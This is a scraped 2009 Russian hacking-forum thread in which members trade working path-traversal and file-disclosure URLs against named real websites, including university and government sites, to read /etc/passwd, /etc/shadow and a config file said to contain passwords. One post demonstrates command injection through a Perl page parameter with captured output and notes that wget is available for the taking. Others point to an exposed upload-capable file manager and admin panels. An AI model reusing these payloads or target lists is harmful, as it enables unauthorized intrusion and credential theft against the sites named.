Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.01.2009, 00:40
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
Сообщение от The matrix
Код:
http://fleaket.com/index.pl?page=../../../../../../../etc/passwd
читаем passwd
Резуляьтат Смотрим в сурсах Прошу прощения... Тут можно без проблем все до конца дрвести(до выполнеия кода), уж так решил, посмотреть и довести до ума то, что не довел раньше.
Движлан на перле
читаем index.pl
Код:
http://fleaket.com/index.pl?page=index.pl
из содержания можно понять.
Его болезнь
Код:
if (open(PAGE, $page))
стоит проверка на наличие файла.
Стандартная связка |id| не прокатит
Там еще есть один момент, но слишком в подробности вдаваться не буду сразу к делу. Эксплуатируется баг следующим образом.
Код:
http://fleaket.com/index.pl?page=/|id|
]
просто получаем выполнение кода.
uid=48(apache) gid=48(apache) groups=48(apache)
Код:
http://fleaket.com/index.pl?page=/|which%20wget|
/usr/bin/wget
Вроди как робит вгет, кому надо забирайте.
Еще из исходника понял, что продукт называется
PhoneBox
|
|
|
01.02.2009, 20:07
|
|
Участник форума
Регистрация: 31.07.2008
Сообщений: 207
Провел на форуме:
299231
Репутация:
107
|
|
уязвимость OsCommerce/вывод файлов.
вот конфиг с паролями отмайскула. кому надо, юзайте )
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
таким образом можно и почитать /etc/passwd, но это уже думайте сами )
___
Спс скажи ++!
|
|
|
|
01.02.2009, 20:11
|
|
Участник форума
Регистрация: 31.07.2008
Сообщений: 207
Провел на форуме:
299231
Репутация:
107
|
|
Хотя ладно, пользуйтесь на здоровье:
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../../../../../../etc/passwd
|
|
|
|
02.02.2009, 09:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Десяток. PR разношерстный.
http://protan.ru/page3.php?open=../../../../../etc/passwd
http://www.deweydoes.org/index.php?page=../../../../../../../etc/passwd
http://www.ulpan.net/index.php?menu=start&page=../../../../etc/passwd
http://www.scheduledairlinefailure.co.uk/index.php?page=../../../../etc/passwd
http://deserteuropean.com/content.html?page=../../../../../../etc/passwd
http://www.dumamanzi.co.za/index.php?page=../../../../etc/passwd OR etc/shadow(черный текст на черном фоне)
http://www.kerryjohnson.com/index12.php?page=../../../etc/passwd
https://www.asmic.co.jp/asmic.php?page=../../../../etc/passwd
http://amhet.com/?page=../../../../../../etc/passwd
http://www.ansicom.net/main.php?page=../images/pic1.jpg
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
02.02.2009, 15:55
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
Edu
http://disability.ucdavis.edu/news_retrieve.php?Article=../../../boot.ini
windows |
|
|
|
03.02.2009, 14:34
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.turnir.ro/?locatie=/../../../../../../../../../../../../../../../../../etc/passwd
|
|
|
|
06.02.2009, 15:38
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
edu
есть пхпмайадмин))
http://duck.creighton.edu/index.php?target=../../../../../etc/passwd
http://elab.njit.edu/seio/index.php?page_link=../../../../../../../../etc/passwd&menu=6&page_name=Section+des+membres
Последний раз редактировалось $n@ke; 06.02.2009 в 15:50..
|
|
|
|
06.02.2009, 17:56
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
Код:
http://altronix.securesites.net/index.php?pid=2&page_link=../../../../etc/passwd
Код:
http://editiere.de/demo/edit/filemanager.php?cdir=../../../www.editiere.de/
А вот это вообще веселье, вижу такое впервые, компания предоставляет хостинг и вот такое есть на сайте =) натолкнулся вообще случайно... =) В нем можно так же загружать файлы=) |
|
|
|
06.02.2009, 20:24
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
GAV-GAV =)
http://partcfitpvt.vermont.gov/parental_rights.php?show=../../../../../../../../../etc/passwd
|
|
|
|
08.02.2009, 18:14
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
gpec.ubc.ca PR5
Код:
http://www.gpec.ubc.ca/index.php?content=../../../etc/passwd
Админка:
Код:
http://www.gpec.ubc.ca/admin/
C basic авторизацией =)
Ну админка лысая =) ее можно посмотреть вот так:
Код:
http://www.gpec.ubc.ca/index.php?content=admin/index.php
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
